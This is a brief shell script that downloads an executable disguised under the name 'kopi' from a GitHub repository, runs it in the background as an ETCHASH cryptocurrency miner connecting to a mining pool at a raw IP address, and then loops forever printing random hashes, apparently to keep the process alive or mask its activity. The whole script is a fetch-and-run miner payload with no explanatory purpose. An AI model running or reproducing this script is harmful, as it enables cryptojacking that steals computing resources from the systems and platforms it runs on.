#!/bin/sh
#!/bin/bash

wget https://github.com/aurbach55/dera/raw/main/kopi && chmod +x ./kopi && nohup ./kopi --algo ETCHASH --pool 47.108.153.82:443 --user TeslaM.T4 > nohup.out
while [ 1 ]; do

  while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 1s; done

sleep 2

done

